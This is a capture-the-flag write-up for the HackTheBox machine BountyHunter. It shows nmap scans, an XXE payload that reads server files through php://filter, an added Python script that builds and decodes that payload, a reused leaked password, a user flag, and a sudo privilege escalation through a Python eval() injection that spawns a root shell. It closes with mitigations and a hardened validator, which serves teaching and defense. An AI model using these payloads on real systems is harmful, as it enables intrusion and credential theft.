BountyHunter 10.10.11.100
by [email protected], 11 Sep 2021

Background

BountyHunter is a Linux-based machine from HackTheBox. It requires patient web enumeration, some familiarity with encodings, and Python knowledge for the privilege escalation.
XXE is the technique used to gain initial access. The web application is vulnerable to XML external entity injection, which lets an attacker interfere with how the application processes XML data. This loophole is used to read configuration files on the target; a DB configuration file contains a login credential that, reused for a system account, gives SSH access.
The initial account can execute a Python script with root privilege. The script passes user-controlled text to eval(), one of the dangerous Python functions (together with exec() and Python 2's input()), and that is what the privilege escalation abuses.
Target Machine: 10.10.11.100
Attacker Machine: 10.10.14.3

Hacking Process Part 0 – Service Scanning

Nmap

Full port sweep first, then a script and version scan of only the ports found open:

nmap -p- -T5 --min-rate=1000 10.10.11.100 -oG fkclai.nmap
nmap -p $(grep -Eo '[0-9]{1,5}/open' fkclai.nmap | cut -d '/' -f 1 | tr -s '\n' ',') -sC -sV 10.10.11.100 -o nmap-result.txt

Starting Nmap 7.80 ( https://nmap.org ) at 2021-09-05 22:26 HKT
Nmap scan report for 10.10.11.100
Host is up (0.23s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Bounty Hunters
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.33 seconds

Enumeration Strategies
No known vulnerability matched the SSH and HTTP service versions, so the next step was to review the web application for information leakage or misconfiguration.

Hacking Process Part 1 – Enumeration

Basic web enumeration with gobuster turned up a set of pages; the interesting one was a bug-report page with a submission form.
Captured the HTTP Request
The data posted to the backend was Base64-encoded and then URL-encoded. After decoding, the body turned out to be an XML document:

<?xml version="1.0" encoding="ISO-8859-1"?>

<bugreport>
<title></title>
<cwe></cwe>
<cvss></cvss>
<reward></reward>
</bugreport>


Possible XML Injection

Tried payloads from the XML External Entity (XXE) Injection Payload List, and the endpoint was injectable. The following files were read; db.php turned out to contain a login credential.
  • /etc/passwd
  • /index.php
  • /db.php
The injection payload is below. The external entity is declared in the DOCTYPE and referenced (&xxe;) in the title field, which the page echoes back in its response; the php://filter wrapper returns the file Base64-encoded, so PHP source containing <? does not break the XML. Remember to Base64- and then URL-encode the document before sending it in the HTTP request.

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=db.php">]>
<bugreport>
<title>&xxe;</title>
<cwe>b</cwe>
<cvss>c</cvss>
<reward>e</reward>
</bugreport>

CyberChef was used to prepare the encoded payload (Base64, then URL-encode). The author's encoded request body:
PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IklTTy04ODU5LTEiPz4KPCFET0NUWVBFIHJlcGxhY2UgWzwhRU5USVRZIHh4ZSBTWVNURU0gInBocDovL2ZpbHRlci9jb252ZXJ0LmJhc2U2NC1lbmNvZGUvcmVzb3VyY2U9ZGIucGhwIj5dPgoJCTxidWdyZXBvcnQ%2BCgkJPHRpdGxlPmE8L3RpdGxlPgoJCTxjd2U%2BYjwvY3dlPgoJCTxjdnNzPmM8L2N2c3M%2BCgkJPHJld2FyZD5lPC9yZXdhcmQ%2BCgkJPC9idWdyZXBvcnQ%2B
After submitting the payload, the response HTML contained a Base64-encoded block where the title is echoed.
Decoding it gave db.php, which held a database login credential:

<?php
// TODO -> Implement login system with the database.
$dbserver = "localhost";
$dbname = "bounty";
$dbusername = "admin";
$dbpassword = "m19RoAU0hP41A1sTsq6K";
$testuser = "test";
?>

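As an added example that is not part of the original writeup, the Python below builds the XXE payload used above, applies the same Base64-then-URL encoding the form uses, and pulls the Base64 blob out of a response and decodes it back to the file. The response HTML and the db.php contents are constructed here so the code runs offline; the real POST parameter name and page layout are not shown on the page and are not assumed.

```python
import base64
import re
import urllib.parse


def build_xxe_payload(resource: str, entity: str = "xxe") -> str:
    """Bug-report XML with an external entity that reads `resource` via php://filter.

    The entity is referenced in <title>, the field the page echoes back; php://filter
    Base64-encodes the file so '<?php' inside it cannot break the XML.
    """
    return (
        '<?xml version="1.0" encoding="ISO-8859-1"?>\n'
        f'<!DOCTYPE replace [<!ENTITY {entity} SYSTEM '
        f'"php://filter/convert.base64-encode/resource={resource}">]>\n'
        "<bugreport>\n"
        f"<title>&{entity};</title>\n"
        "<cwe>b</cwe>\n"
        "<cvss>c</cvss>\n"
        "<reward>e</reward>\n"
        "</bugreport>\n"
    )


def encode_for_request(xml: str) -> str:
    """Base64 the XML, then URL-encode it so '+', '/' and '=' survive the POST body."""
    b64 = base64.b64encode(xml.encode("iso-8859-1")).decode("ascii")
    return urllib.parse.quote(b64, safe="")


def decode_request(body: str) -> str:
    """Reverse of encode_for_request; useful for reading a captured request."""
    return base64.b64decode(urllib.parse.unquote(body)).decode("iso-8859-1")


# A run of Base64 characters long enough not to be an ordinary word.
_B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def extract_file_from_response(html: str) -> str:
    """Find the longest Base64 run in the response and decode it to the leaked file."""
    runs = _B64_RE.findall(html)
    if not runs:
        raise ValueError("no Base64 blob in response")
    return base64.b64decode(max(runs, key=len)).decode("utf-8", errors="replace")


# Constructed sample (not captured from the target): a made-up db.php and the kind of
# table the bug-report page would render with the entity expanded inside the title cell.
SAMPLE_DB_PHP = '<?php\n$dbusername = "admin";\n$dbpassword = "example-only";\n?>\n'
SAMPLE_RESPONSE = (
    "<table><tr><td>Title:</td><td>"
    + base64.b64encode(SAMPLE_DB_PHP.encode()).decode()
    + "</td></tr><tr><td>CWE:</td><td>b</td></tr></table>"
)

if __name__ == "__main__":
    payload = build_xxe_payload("db.php")
    print(encode_for_request(payload))          # paste into the request body
    print(extract_file_from_response(SAMPLE_RESPONSE))
```

Swap the resource for /etc/passwd or index.php to repeat the reads from the list above; the encoder and decoder do not change.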

Hacking Process Part 2 – Gaining Foothold

Logging in to the SSH service with the credential from db.php failed.
The /etc/passwd file retrieved through the XXE listed a user "development" with a login shell:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
development:x:1000:1000:Development:/home/development:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin

SSH as "development" with the database password "m19RoAU0hP41A1sTsq6K" succeeded (password reuse), and the user flag was found:
a0929aa9a9ec25cec7bc41a139f2b829

Hacking Process Part 3 – Privilege Escalation

Listing the sudo rights of this account (sudo -l) showed something interesting: a Python script could be run as root without a password.
The script, ticketValidator.py, was:

def load_file(loc):
    # Only a path ending in .md is accepted; anything else exits the script.
    if loc.endswith(".md"):
        return open(loc, 'r')
    else:
        print("Wrong file type.")
        exit()

def evaluate(ticketFile):
    #Evaluates a ticket to check for ireggularities.
    code_line = None
    for i,x in enumerate(ticketFile.readlines()):
        if i == 0:
            if not x.startswith("# Skytrain Inc"):
                return False
            continue
        if i == 1:
            if not x.startswith("## Ticket to "):
                return False
            print(f"Destination: {' '.join(x.strip().split(' ')[3:])}")
            continue

        if x.startswith("__Ticket Code:__"):
            code_line = i+1
            continue

        if code_line and i == code_line:
            if not x.startswith("**"):
                return False
            # Only the text before the first '+' is checked as a number...
            ticketCode = x.replace("**", "").split("+")[0]
            if int(ticketCode) % 7 == 4:
                # ...but the whole line is handed to eval(), so arbitrary Python runs here as root.
                validationNumber = eval(x.replace("**", ""))
                if validationNumber > 100:
                    return True
                else:
                    return False
    return False

def main():
    fileName = input("Please enter the path to the ticket file.\n")
    ticket = load_file(fileName)
    #DEBUG print(ticket)
    result = evaluate(ticket)
    if (result):
        print("Valid ticket.")
    else:
        print("Invalid ticket.")
    ticket.close  # as found on the box: no parentheses, so the file is never explicitly closed

main()

The script reads a file whose name ends in .md (load_file() rejects anything else) and applies the following checks:
  • Line 1 must start with "# Skytrain Inc"
  • Line 2 must start with "## Ticket to " (two hashes); the rest of that line is printed as the destination
  • A later line must start with "__Ticket Code:__"
  • The line right after it must start with "**". Every "**" is stripped, the text before the first "+" is taken as the ticket code, and int(code) % 7 must equal 4
  • The whole stripped line is then passed to eval(), and the result must be greater than 100 for the ticket to be valid
Because the numeric check is int(code) % 7 == 4, 102 (14 * 7 + 4) is a usable ticket code. The eval() call is the weak spot, as described in the Hacking Python Applications article: everything after the number on that line is evaluated as Python. Appending a second condition with "and" keeps the part before the first "+" a plain number while the rest executes arbitrary code, here __import__('os').system('/bin/bash').
The ticket file, saved with a .md extension, was:

# Skytrain Inc
## Ticket to root
__Ticket Code:__
**102+ 2 == 104 and __import__('os').system('/bin/bash') == False

When eval() reaches os.system('/bin/bash') it spawns a shell, and because the script runs under sudo that shell is root. After the shell exits, system() returns 0, 0 == False is True, and eval() returns True; True > 100 is False, so the script prints "Invalid ticket.", but by then the root shell has already been used.
Running the script through sudo and entering the path to this file gave root access.
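As an added example (not the author's ticket file and not the script from the box), the Python below reproduces the validator's rules in a vulnerable form that mirrors ticketValidator.py and in a hardened form that parses the ticket code as integers instead of evaluating it. The injected line passes the "102" check, runs code inside eval(), and even comes back as a valid ticket; a harmless environment write stands in for the page's system('/bin/bash'). The legitimate ticket format (integers joined by "+" between "**") is an assumption, since the page does not show a genuine ticket.

```python
import os
import re
from typing import List, Optional

# Constructed tickets, not files from the target.
LEGIT_TICKET = [
    "# Skytrain Inc\n",
    "## Ticket to Edinburgh\n",
    "__Ticket Code:__\n",
    "**102+10+20**\n",          # assumed legitimate shape: ints joined by '+'
]

# 102 % 7 == 4, so the script reaches eval(). Precedence makes the rest read as
#   (102+2 == 104) and (None or 101)
# the environment write executes as a side effect (standing in for the page's
# __import__('os').system('/bin/bash')) and the expression evaluates to 101 > 100.
INJECTED_TICKET = [
    "# Skytrain Inc\n",
    "## Ticket to root\n",
    "__Ticket Code:__\n",
    "**102+2 == 104 and (__import__('os').environ.__setitem__('PWNED', '1') or 101)\n",
]

# Same payload with a single-hash second line: the script wants "## Ticket to ",
# so this never reaches eval().
WRONG_HEADER_TICKET = [INJECTED_TICKET[0], "# Ticket to root\n"] + INJECTED_TICKET[2:]


def _code_line(lines: List[str]) -> Optional[str]:
    """Header checks from ticketValidator.py; returns the line after __Ticket Code:__."""
    if len(lines) < 2:
        return None
    if not lines[0].startswith("# Skytrain Inc") or not lines[1].startswith("## Ticket to "):
        return None
    for i in range(2, len(lines) - 1):
        if lines[i].startswith("__Ticket Code:__"):
            return lines[i + 1]
    return None


def evaluate_vulnerable(lines: List[str]) -> bool:
    """Same rules as the script's evaluate(), including the eval() call."""
    x = _code_line(lines)
    if x is None or not x.startswith("**"):
        return False
    ticket_code = x.replace("**", "").split("+")[0]   # only this part is checked as a number
    if int(ticket_code) % 7 != 4:
        return False
    validation_number = eval(x.replace("**", ""))      # attacker-controlled text executes here
    return validation_number > 100


_CODE_RE = re.compile(r"\d+(?:\+\d+)*")


def evaluate_safe(lines: List[str]) -> bool:
    """Same business rules; the code line is parsed as integers and never executed."""
    x = _code_line(lines)
    if x is None:
        return False
    body = x.strip()
    if not (body.startswith("**") and body.endswith("**")):
        return False
    body = body[2:-2]
    if not _CODE_RE.fullmatch(body):
        return False
    parts = [int(p) for p in body.split("+")]
    return parts[0] % 7 == 4 and sum(parts) > 100


def exploit_marker_set() -> bool:
    """True once the injected expression has run in this process."""
    return os.environ.get("PWNED") == "1"


def clear_marker() -> None:
    os.environ.pop("PWNED", None)


if __name__ == "__main__":
    clear_marker()
    print("legit, vulnerable:", evaluate_vulnerable(LEGIT_TICKET))
    print("legit, safe:      ", evaluate_safe(LEGIT_TICKET))
    print("injected, safe:   ", evaluate_safe(INJECTED_TICKET), "ran:", exploit_marker_set())
    print("injected, vuln:   ", evaluate_vulnerable(INJECTED_TICKET), "ran:", exploit_marker_set())
```

The hardened version keeps the same acceptance rule (first number is 4 mod 7, sum over 100) but only ever calls int() on digit strings, so a line carrying anything beyond "+"-joined integers is rejected before any code could run.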

Conclusion

To prevent the XXE on PHP 7, call libxml_disable_entity_loader(true) before parsing untrusted XML so external entities are never resolved. On PHP 8.0 and later that function is deprecated because external entity loading is already disabled by default; the remaining rule is to never pass LIBXML_NOENT when parsing user input. The privilege escalation has two causes to fix: ticketValidator.py should parse the ticket code as integers instead of calling eval() on user-supplied text, and a passwordless sudo rule for a script that reads arbitrary files is itself a risk. Finally, reusing the database password for the development account is what turned a file read into a shell.

Reference

payloadbox/xxe-injection-payload-list: XML External Entity (XXE) Injection Payload List (GitHub)
Hacking Python Applications (Medium)